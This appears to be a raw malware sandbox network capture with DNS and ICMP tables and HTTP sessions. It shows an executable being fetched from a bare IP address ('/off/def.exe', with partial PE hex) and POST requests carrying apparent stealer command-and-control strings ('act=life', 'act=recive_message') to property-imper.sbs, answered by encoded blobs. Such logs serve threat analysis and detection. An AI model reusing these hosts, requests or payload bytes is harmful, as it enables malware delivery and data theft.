.taggant	0x492000	0x3000	0x2200	1bc4d532e341386f25f9fbd700f1419d	False	0.060776654411764705	DOS executable (COM)	0.7271734843937445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 03:04:06.302966118 CET	52282	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:06.739276886 CET	53	52282	1.1.1.1	192.168.2.5
Nov 24, 2024 03:04:41.059298038 CET	53	57285	1.1.1.1	192.168.2.5
Nov 24, 2024 03:04:41.061350107 CET	53	64913	1.1.1.1	192.168.2.5
Nov 24, 2024 03:04:44.209841967 CET	53	54516	1.1.1.1	192.168.2.5
Nov 24, 2024 03:04:45.390309095 CET	54949	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:45.390496016 CET	64931	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:45.527084112 CET	53	54949	1.1.1.1	192.168.2.5
Nov 24, 2024 03:04:45.527401924 CET	53	64931	1.1.1.1	192.168.2.5
Nov 24, 2024 03:04:47.617064953 CET	51483	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:47.617203951 CET	55070	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:51.115503073 CET	56930	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:51.115725040 CET	50351	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:55.946119070 CET	61193	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:55.946403027 CET	56990	53	192.168.2.5	1.1.1.1
Nov 24, 2024 03:04:56.005124092 CET	53	60558	1.1.1.1	192.168.2.5
Nov 24, 2024 03:05:01.298971891 CET	53	63914	1.1.1.1	192.168.2.5
Nov 24, 2024 03:05:20.262660980 CET	53	54211	1.1.1.1	192.168.2.5
Nov 24, 2024 03:05:40.840648890 CET	53	57831	1.1.1.1	192.168.2.5
Nov 24, 2024 03:05:43.110976934 CET	53	64324	1.1.1.1	192.168.2.5
Nov 24, 2024 03:06:11.618949890 CET	53	54015	1.1.1.1	192.168.2.5

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 24, 2024 03:04:41.171139002 CET	192.168.2.5	1.1.1.1	c234	(Port unreachable)	Destination Unreachable
Nov 24, 2024 03:04:59.910182953 CET	192.168.2.5	1.1.1.1	c265	(Port unreachable)	Destination Unreachable
Nov 24, 2024 03:06:10.655576944 CET	192.168.2.5	1.1.1.1	c234	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 03:04:28.732249975 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 24, 2024 03:04:30.108242035 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Nov 2024 02:04:29 GMT Content-Type: application/octet-stream Content-Length: 2842624 Last-Modified: Sun, 24 Nov 2024 02:00:08 GMT Connection: keep-alive ETag: "674288a8-2b6000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 b6 27 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,',`Ui` @ @.rsrc`2@.idata 8@heclofms++:@owtxsouk +:+@.taggant@+">+@
Nov 24, 2024 03:04:30.108299017 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.108700037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.108756065 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.108768940 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.109260082 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.109289885 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.109302998 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.109535933 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.109632969 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 24, 2024 03:04:30.228039980 CET	1236	IN	Data Raw: 72 1a 34 bd 7d d8 74 70 19 b8 06 b7 38 c9 3e 9c 4f 68 69 88 5c f5 2a c1 cf bb 8b 8b 29 ab f7 cd 3e e6 61 93 dc c6 4a ef 15 cc b3 97 05 c1 4a 9e 5c e8 7d 87 4a 4d 70 7a 03 f8 8f 12 41 da fd 7a 53 e7 56 63 18 f8 92 f2 e0 c3 24 13 41 da fd e8 51 db Data Ascii: r4}tp8>Ohi\*)>aJJ\}JMpzAzSVc$AQVpq'yRt[5~3ZsnU"7a8dQz(Nzm)39nYNz$C]+^dyo\|'1\ jRo\y!@yfR]Yr[wqmI{r

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 24, 2024 03:04:31.818645954 CET	13.107.246.63	443	192.168.2.5	49732	CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013	Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0	28a2c9bd18a11de089ef85a160da29e4
					CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jun 08 02:00:00 CEST 2023	Wed Aug 26 01:59:59 CEST 2026
					CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 01 14:00:00 CEST 2013	Fri Jan 15 13:00:00 CET 2038

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: property-imper.sbs
2024-11-24 02:04:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-24 02:04:08 UTC	1019	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=94ivaslbaaut7oquihoushcakp; expires=Wed, 19-Mar-2025 19:50:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYXzAUvv%2FvmBZexP8FC3LOCly8tgZR4YvTvEV9NP9ouEGEuddiV14%2F41mqgpoix3QIyfXkVX%2BGz6SOh4VK4E%2FzN7ISiJ%2B2yn%2B7m6L3J6yd0RqqHySiCFWSY5yO3BbU7hofG7Oes%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d398286e0f65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1753753&cwnd=222&unsent_bytes=0&cid=b21b08f987b85eb3&ts=706&x=0"
2024-11-24 02:04:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-24 02:04:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:10 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: property-imper.sbs
2024-11-24 02:04:10 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-24 02:04:10 UTC	1019	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q3a405281ivmjhvndnmtvs4pkl; expires=Wed, 19-Mar-2025 19:50:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYVV%2FimIgOmrayapFZ4Nc0l6s3pA5Uxric5nuu%2BBZNQJO2sPsg7isyP9KvVjuO6%2B3RQ8p%2BnNSlELm%2B1%2FE07mxH8563OO4HtxGyDwUfhcTblSBk7ix59WFms1g7gAlJhWl2IAQE8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e75d3a50d454314-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1569048&cwnd=181&unsent_bytes=0&cid=6bbebc13d7883f79&ts=732&x=0"
2024-11-24 02:04:10 UTC	350	IN	Data Raw: 31 35 31 66 0d 0a 75 34 39 69 43 45 30 77 61 56 6e 73 4f 37 70 50 33 36 58 42 53 6c 6b 79 38 56 67 4b 6b 4a 2f 73 63 35 61 61 72 36 54 59 6e 5a 7a 41 72 52 51 71 64 77 52 46 65 35 39 65 6d 48 57 72 31 37 51 76 64 52 43 51 50 43 69 71 2b 59 30 66 35 66 2b 44 68 71 37 77 76 6f 48 70 41 32 51 2b 56 55 56 37 69 55 4f 59 64 59 54 65 34 79 38 33 45 4d 74 36 62 2f 72 39 6a 52 2f 30 2b 38 54 4c 71 50 48 2f 30 2b 4d 46 59 43 68 54 44 54 69 41 56 74 38 71 75 73 53 72 4a 44 42 66 6d 54 55 6f 76 4c 32 4a 43 62 53 67 6a 65 6d 39 36 66 33 32 37 68 46 6a 62 30 31 46 49 73 35 65 31 47 33 6c 68 36 41 76 4f 31 36 58 50 47 48 34 39 34 51 58 39 66 37 46 31 4c 48 37 39 4e 50 74 42 6d 45 69 57 68 6b 31 69 6c 48 55 4c 4c 44 45 34 32 5a 37 56 34 74 36 4d 4c 4b 75 76 42 4c 6c 36 Data Ascii: 151fu49iCE0waVnsO7pP36XBSlky8VgKkJ/sc5aar6TYnZzArRQqdwRFe59emHWr17QvdRCQPCiq+Y0f5f+Dhq7wvoHpA2Q+VUV7iUOYdYTe4y83EMt6b/r9jR/0+8TLqPH/0+MFYChTDTiAVt8qusSrJDBfmTUovL2JCbSgjem96f327hFjb01FIs5e1G3lh6AvO16XPGH494QX9f7F1LH79NPtBmEiWhk1ilHULLDE42Z7V4t6MLKuvBLl6
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 42 6d 51 75 58 77 73 70 68 6c 4c 54 4b 4b 2f 4d 71 69 55 32 55 4a 34 77 5a 2f 48 39 69 52 76 2b 39 38 66 43 74 2f 4c 34 32 65 31 41 4a 47 39 56 45 33 76 57 47 66 73 6f 72 63 43 76 50 6e 6c 71 30 79 55 6d 36 37 32 4a 48 62 53 67 6a 63 36 2f 2f 50 33 53 34 67 4e 69 4a 45 41 4c 4b 59 68 55 33 54 2b 37 77 71 30 69 4f 45 4b 5a 4e 47 37 78 39 49 55 59 38 66 2f 4a 68 76 53 2f 2b 63 47 74 57 43 6f 4f 58 77 41 33 68 45 37 59 62 61 4b 4a 75 6d 67 38 58 4e 4e 69 4b 50 62 38 69 68 44 77 39 73 50 43 74 76 6e 77 31 4f 49 47 59 43 39 56 41 54 4f 47 57 4e 55 6d 73 73 65 6d 4a 54 39 57 6e 7a 74 74 73 72 50 4f 46 75 79 34 6c 59 61 55 2b 50 33 4c 72 7a 56 70 49 56 77 4d 4c 63 35 47 6c 6a 54 39 77 4b 39 6f 59 78 43 64 50 32 66 67 2f 4a 77 55 2b 75 72 42 77 37 7a 79 2f 64 66 Data Ascii: BmQuXwsphlLTKK/MqiU2UJ4wZ/H9iRv+98fCt/L42e1AJG9VE3vWGfsorcCvPnlq0yUm672JHbSgjc6//P3S4gNiJEALKYhU3T+7wq0iOEKZNG7x9IUY8f/JhvS/+cGtWCoOXwA3hE7YbaKJumg8XNNiKPb8ihDw9sPCtvnw1OIGYC9VATOGWNUmssemJT9WnzttsrPOFuy4lYaU+P3LrzVpIVwMLc5GljT9wK9oYxCdP2fg/JwU+urBw7zy/df
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 56 77 4d 4c 63 35 47 6c 6a 54 39 77 4b 39 6f 59 78 43 66 4d 32 6a 35 39 34 6f 52 38 2f 58 49 78 62 33 38 38 39 37 6e 44 6d 30 72 58 67 49 32 69 46 6e 66 4b 62 6a 56 70 69 45 33 58 4e 4e 30 4b 50 58 6c 7a 6b 6d 30 31 38 72 51 75 64 44 39 79 4f 52 41 64 57 46 4c 53 7a 79 43 47 59 42 74 75 73 4b 72 49 7a 31 59 6b 79 68 74 2f 50 61 50 47 2f 4c 35 77 4d 71 38 2f 2f 2f 5a 36 77 78 71 4b 46 55 5a 4b 59 74 66 79 69 66 39 69 65 4d 76 49 78 44 4c 65 6c 37 69 36 70 38 48 74 73 33 4f 79 4c 54 34 36 4a 6e 79 54 6e 4e 76 56 51 64 37 31 68 6e 54 4c 62 48 41 71 79 34 2f 57 4a 77 31 59 65 44 38 67 68 2f 6d 2f 38 33 50 74 50 44 79 30 4f 41 48 5a 79 52 59 42 6a 2b 4a 57 4a 68 6a 2f 63 43 37 61 47 4d 51 70 53 70 6c 2f 74 4f 46 48 66 32 34 30 6f 69 6a 76 2f 6e 56 72 56 67 71 Data Ascii: VwMLc5GljT9wK9oYxCfM2j594oR8/XIxb38897nDm0rXgI2iFnfKbjVpiE3XNN0KPXlzkm018rQudD9yORAdWFLSzyCGYBtusKrIz1Ykyht/PaPG/L5wMq8///Z6wxqKFUZKYtfyif9ieMvIxDLel7i6p8Hts3OyLT46JnyTnNvVQd71hnTLbHAqy4/WJw1YeD8gh/m/83PtPDy0OAHZyRYBj+JWJhj/cC7aGMQpSpl/tOFHf240oijv/nVrVgq
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 53 50 58 64 30 6f 75 63 43 6e 4c 6a 51 51 33 58 70 76 36 72 33 57 55 64 76 66 2b 49 53 62 78 62 37 47 6f 78 6b 71 4b 46 35 4c 59 38 35 56 32 79 47 31 79 4b 55 68 4e 31 71 61 4d 57 54 35 2b 59 49 59 38 66 37 4d 77 37 2f 2b 2b 74 58 6e 42 6d 6b 73 58 51 51 30 68 68 6d 57 62 62 72 66 34 33 42 37 64 59 51 78 5a 76 53 39 6b 56 2f 74 75 4d 72 4b 2b 71 65 2b 31 65 51 47 62 43 70 65 43 6a 32 47 58 4e 41 70 76 4d 47 6c 4b 7a 52 55 6c 6a 74 6e 39 76 47 41 47 2f 58 35 77 63 32 31 39 50 75 5a 6f 30 42 74 4e 78 4a 54 65 37 39 61 7a 6a 71 74 79 2b 4d 33 64 55 6e 54 50 57 53 79 70 63 34 51 35 76 4c 48 79 4c 2f 77 2b 39 72 69 42 32 63 70 58 67 45 79 68 6c 2f 58 4a 4b 2f 45 72 79 59 38 58 70 38 30 5a 66 6a 2b 67 31 47 36 75 4d 72 65 2b 71 65 2b 39 65 6f 4e 52 43 52 65 44 Data Ascii: SPXd0oucCnLjQQ3Xpv6r3WUdvf+ISbxb7GoxkqKF5LY85V2yG1yKUhN1qaMWT5+YIY8f7Mw7/++tXnBmksXQQ0hhmWbbrf43B7dYQxZvS9kV/tuMrK+qe+1eQGbCpeCj2GXNApvMGlKzRUljtn9vGAG/X5wc219PuZo0BtNxJTe79azjqty+M3dUnTPWSypc4Q5vLHyL/w+9riB2cpXgEyhl/XJK/EryY8Xp80Zfj+g1G6uMre+qe+9eoNRCReD
2024-11-24 02:04:10 UTC	958	IN	Data Raw: 4b 62 66 4f 48 70 44 42 37 43 4e 4d 4d 62 2b 4c 74 6a 56 50 46 37 73 37 51 73 66 4c 79 6d 66 4a 4f 63 32 39 56 42 33 76 57 47 64 34 69 74 4d 53 73 4b 54 4a 63 6e 6a 39 68 39 2f 79 49 46 66 37 79 7a 63 43 38 2f 76 76 54 37 67 46 67 4a 6c 55 44 50 49 31 4c 6d 47 50 39 77 4c 74 6f 59 78 43 36 50 58 72 38 37 63 34 4f 75 75 47 4e 77 62 61 2f 70 70 6e 70 43 6d 55 72 56 51 63 39 69 31 2f 56 4c 4c 4c 47 6f 79 63 2f 57 35 6f 38 61 66 2f 34 67 78 58 6d 38 73 62 4a 74 76 62 79 31 4b 31 4f 4b 69 68 4b 53 32 50 4f 61 4e 55 6a 73 38 43 31 61 43 51 65 69 6e 70 76 2f 72 33 57 55 66 58 30 77 73 57 31 2f 50 33 59 35 78 4a 34 49 31 73 44 50 6f 4a 53 31 69 75 76 77 61 77 68 4f 46 4f 61 50 57 44 2b 39 34 30 57 74 4c 61 4e 77 61 4b 2f 70 70 6e 4f 46 33 6f 69 45 68 52 31 6c 78 Data Ascii: KbfOHpDB7CNMMb+LtjVPF7s7QsfLymfJOc29VB3vWGd4itMSsKTJcnj9h9/yIFf7yzcC8/vvT7gFgJlUDPI1LmGP9wLtoYxC6PXr87c4OuuGNwba/ppnpCmUrVQc9i1/VLLLGoyc/W5o8af/4gxXm8sbJtvby1K1OKihKS2POaNUjs8C1aCQeinpv/r3WUfX0wsW1/P3Y5xJ4I1sDPoJS1iuvwawhOFOaPWD+940WtLaNwaK/ppnOF3oiEhR1lx
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 32 66 34 64 0d 0a 4a 47 2b 62 33 77 73 75 35 2f 2f 76 4c 37 42 4a 6c 4a 46 63 49 50 34 46 57 31 43 57 33 68 2b 31 6f 50 45 6a 54 59 69 6a 65 2f 70 38 62 74 74 2f 58 30 4c 33 7a 37 39 4c 67 44 43 6f 77 48 42 4a 37 69 56 57 59 64 66 33 48 6f 69 55 70 56 5a 49 77 59 76 2f 31 67 52 54 78 39 38 6e 43 73 66 48 73 31 2b 49 41 62 43 52 54 44 6a 69 46 55 39 59 6b 72 34 66 74 61 44 78 49 30 32 49 6f 32 4f 61 50 48 50 69 36 34 38 32 73 2b 4c 7a 34 34 77 74 74 49 30 52 4c 4a 4d 42 41 6d 43 71 78 68 2f 74 6f 4d 6c 36 66 4f 57 2f 36 39 59 73 52 2f 2f 6a 43 7a 4c 54 34 37 4e 50 68 43 6e 67 67 55 51 59 2f 67 31 50 64 4a 4b 2f 43 71 69 35 37 48 74 4d 39 63 4c 4b 6c 7a 69 6e 2f 39 76 2f 46 6f 62 2f 68 6c 2f 52 41 62 53 4d 53 55 33 75 4e 58 74 73 73 74 38 36 76 4a 7a 78 55 Data Ascii: 2f4dJG+b3wsu5//vL7BJlJFcIP4FW1CW3h+1oPEjTYije/p8btt/X0L3z79LgDCowHBJ7iVWYdf3HoiUpVZIwYv/1gRTx98nCsfHs1+IAbCRTDjiFU9Ykr4ftaDxI02Io2OaPHPi6482s+Lz44wttI0RLJMBAmCqxh/toMl6fOW/69YsR//jCzLT47NPhCnggUQY/g1PdJK/Cqi57HtM9cLKlzin/9v/Fob/hl/RAbSMSU3uNXtsst86vJzxU
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 58 6c 7a 6b 6d 30 79 73 66 46 74 75 6e 7a 31 71 30 66 4a 44 59 53 44 44 66 4f 41 5a 67 2f 72 38 65 6f 4b 44 78 65 67 54 74 67 2f 66 65 4f 46 2f 2f 79 7a 73 2b 2b 38 66 66 66 37 41 31 72 4c 6c 49 4f 4f 34 64 4c 31 57 33 7a 68 36 51 77 65 77 6a 54 44 57 54 35 7a 49 30 48 74 4f 65 44 33 2f 72 34 38 70 6d 31 51 47 73 39 58 77 4d 2f 6a 6c 54 65 4a 72 7a 47 6f 43 67 37 55 35 4d 2f 59 2f 33 37 69 52 7a 2b 38 63 54 55 73 76 76 73 32 65 45 45 4b 6d 45 53 44 43 50 4f 41 5a 67 64 76 73 79 76 4b 44 5a 46 30 79 55 6d 36 37 32 4a 48 62 53 67 6a 63 36 78 39 50 6a 53 37 67 4e 6b 4a 46 67 45 4e 49 52 66 33 69 57 34 78 36 38 6f 50 6c 61 58 50 6d 62 31 38 34 4d 51 35 76 76 45 68 76 53 2f 2b 63 47 74 57 43 6f 50 57 52 30 2b 69 55 2b 61 47 4c 37 4a 72 53 38 74 45 49 77 46 4a Data Ascii: Xlzkm0ysfFtunz1q0fJDYSDDfOAZg/r8eoKDxegTtg/feOF//yzs++8fff7A1rLlIOO4dL1W3zh6QwewjTDWT5zI0HtOeD3/r48pm1QGs9XwM/jlTeJrzGoCg7U5M/Y/37iRz+8cTUsvvs2eEEKmESDCPOAZgdvsyvKDZF0yUm672JHbSgjc6x9PjS7gNkJFgENIRf3iW4x68oPlaXPmb184MQ5vvEhvS/+cGtWCoPWR0+iU+aGL7JrS8tEIwFJ
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 52 73 2f 76 66 31 4c 7a 38 36 4e 71 71 50 6c 51 50 57 51 63 34 67 6c 6a 66 62 66 4f 48 72 47 68 6a 61 64 4d 35 65 75 43 79 6e 77 66 35 36 4d 71 4b 73 75 37 7a 31 61 31 4f 4b 6d 4e 57 41 44 65 4c 58 73 68 69 72 39 65 6f 4a 43 30 63 6c 79 67 6f 76 4c 32 66 47 76 76 71 77 38 48 31 37 75 6a 55 2f 51 4e 76 4b 42 34 44 4b 6f 4e 56 6d 47 50 39 30 71 67 6b 50 56 32 47 64 58 6e 6b 2f 70 67 57 75 50 44 63 79 37 61 2f 77 5a 65 74 47 43 70 33 45 6a 34 34 67 46 66 66 4f 36 79 4b 67 79 4d 33 55 35 38 37 62 37 4b 7a 7a 68 65 30 6f 4a 36 49 2b 76 76 76 6d 62 56 51 4f 48 51 48 57 47 7a 65 43 38 64 6a 70 49 65 31 61 47 4d 43 33 58 70 36 73 71 58 4f 56 76 66 71 33 38 43 35 36 66 32 65 30 7a 35 72 49 6c 31 48 4e 59 56 5a 33 7a 32 72 33 4f 38 67 4f 45 71 4a 42 46 62 5a 38 59 Data Ascii: Rs/vf1Lz86NqqPlQPWQc4gljfbfOHrGhjadM5euCynwf56MqKsu7z1a1OKmNWADeLXshir9eoJC0clygovL2fGvvqw8H17ujU/QNvKB4DKoNVmGP90qgkPV2GdXnk/pgWuPDcy7a/wZetGCp3Ej44gFffO6yKgyM3U587b7Kzzhe0oJ6I+vvvmbVQOHQHWGzeC8djpIe1aGMC3Xp6sqXOVvfq38C56f2e0z5rIl1HNYVZ3z2r3O8gOEqJBFbZ8Y
2024-11-24 02:04:10 UTC	1369	IN	Data Raw: 79 74 62 34 32 66 33 50 37 6b 41 6b 62 30 70 4c 59 38 35 34 30 6a 32 77 79 4b 52 6f 64 52 43 58 65 6a 43 79 32 49 4d 63 38 66 62 4b 68 4a 76 31 37 74 54 69 42 79 70 68 45 67 64 37 31 68 6e 5a 4a 36 33 4b 72 43 39 33 56 34 6b 39 4b 4c 79 39 67 46 47 73 75 4d 7a 4d 71 76 4c 78 33 71 45 47 5a 43 45 53 46 48 57 58 47 63 35 74 35 5a 54 74 61 43 6b 51 79 33 6f 76 2f 50 43 50 45 76 72 37 33 39 53 38 2f 4f 6a 61 71 6a 35 55 43 6c 38 47 50 6f 42 65 35 68 4f 63 7a 62 4d 6c 4e 46 66 52 47 6d 2f 6b 2f 72 41 76 77 2b 6e 4b 31 76 6a 5a 2f 63 2f 75 51 43 52 76 53 6b 74 6a 7a 6e 6a 53 50 62 44 49 70 47 6f 62 56 34 55 35 4b 4c 79 39 69 6c 47 73 75 4f 6a 4c 74 2f 72 77 33 71 38 68 59 44 39 66 42 44 7a 